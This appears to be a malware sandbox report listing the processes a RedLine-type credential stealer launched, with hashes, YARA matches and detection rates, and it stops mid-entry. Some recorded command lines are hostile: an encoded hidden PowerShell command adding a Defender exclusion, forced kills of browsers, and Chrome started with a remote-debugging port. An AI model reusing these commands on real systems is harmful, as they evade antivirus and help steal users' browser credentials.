                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe"
                                                                                                                                                                                                                            Imagebase:0x740000
                                                                                                                                                                                                                            File size:1'861'632 bytes
                                                                                                                                                                                                                            MD5 hash:15709EBA2AFAF7CC0A86CE0ABF8E53F1
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2190479666.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 78%, ReversingLabs
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:05:23:34
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff6ba110000
                                                                                                                                                                                                                            File size:3'083'776 bytes
                                                                                                                                                                                                                            MD5 hash:75CA34215F6E3916C51C0AF34FC17284
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2343637701.000001C130C03000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 52%, ReversingLabs
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                            Start time:05:23:36
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                                                                                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:05:23:37
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:05:23:40
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                            Imagebase:0x7ff605670000
                                                                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:05:23:43
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe"
                                                                                                                                                                                                                            Imagebase:0xcc0000
                                                                                                                                                                                                                            File size:2'668'544 bytes
                                                                                                                                                                                                                            MD5 hash:87330F1877C33A5A6203C49075223B16
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 30%, ReversingLabs
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:05:23:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe"
                                                                                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                                                                                            File size:307'712 bytes
                                                                                                                                                                                                                            MD5 hash:95B7A7CBC0AFF0215004C5A56EA5952C
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, Author: Joe Security
                                                                                                                                                                                                                            • Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, Author: Sekoia.io
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:05:23:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                                                                                                                                                                                                                            Imagebase:0xd60000
                                                                                                                                                                                                                            File size:540'672 bytes
                                                                                                                                                                                                                            MD5 hash:9AB250B0DC1D156E2D123D277EB4D132
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:05:23:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:05:23:52
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                                                                                                                                                                                                                            Imagebase:0xd60000
                                                                                                                                                                                                                            File size:540'672 bytes
                                                                                                                                                                                                                            MD5 hash:9AB250B0DC1D156E2D123D277EB4D132
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:05:23:52
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1980
                                                                                                                                                                                                                            Imagebase:0x940000
                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                            Start time:05:23:56
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff7a4f20000
                                                                                                                                                                                                                            File size:605'696 bytes
                                                                                                                                                                                                                            MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                            Start time:05:23:58
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            Imagebase:0x7ff7a4f20000
                                                                                                                                                                                                                            File size:605'696 bytes
                                                                                                                                                                                                                            MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                            Start time:05:24:06
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe"
                                                                                                                                                                                                                            Imagebase:0xb0000
                                                                                                                                                                                                                            File size:1'879'552 bytes
                                                                                                                                                                                                                            MD5 hash:8A0FEB447F024F32D1EE001A56D7EE23
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2816284787.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2825365325.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2788989135.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2814761965.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 74%, ReversingLabs
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                            Start time:05:24:09
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff740970000
                                                                                                                                                                                                                            File size:251'392 bytes
                                                                                                                                                                                                                            MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                            Start time:05:24:15
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe"
                                                                                                                                                                                                                            Imagebase:0x7e0000
                                                                                                                                                                                                                            File size:1'929'216 bytes
                                                                                                                                                                                                                            MD5 hash:CA7C431ABAC02CFB1B6B43ED9B3457E3
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.2838159994.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                            Start time:05:24:24
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff740970000
                                                                                                                                                                                                                            File size:251'392 bytes
                                                                                                                                                                                                                            MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                            Start time:05:24:31
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe"
                                                                                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                                                                                            File size:5'214'208 bytes
                                                                                                                                                                                                                            MD5 hash:7684D60F9F9760FB4AC16A2FA7F5EEDA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                            Start time:05:24:39
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe"
                                                                                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                                                                                            File size:967'680 bytes
                                                                                                                                                                                                                            MD5 hash:3F47413343D51345115E32189E96C142
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                            Start time:05:24:43
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                            Start time:05:24:43
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                            Start time:05:24:45
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                            Imagebase:0x7ff678760000
                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                            Start time:05:24:46
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                            Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                            Start time:05:24:46
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2068,i,843618081044159646,7048051155427762335,262144 /prefetch:8
                                                                                                                                                                                                                            Imagebase:0x7ff678760000
                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                            Start time:05:24:47
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                            Start time:05:24:47
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                            Start time:05:24:48
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                            Start time:05:24:48
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                            Start time:05:24:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                            Start time:05:24:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                            Start time:05:24:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
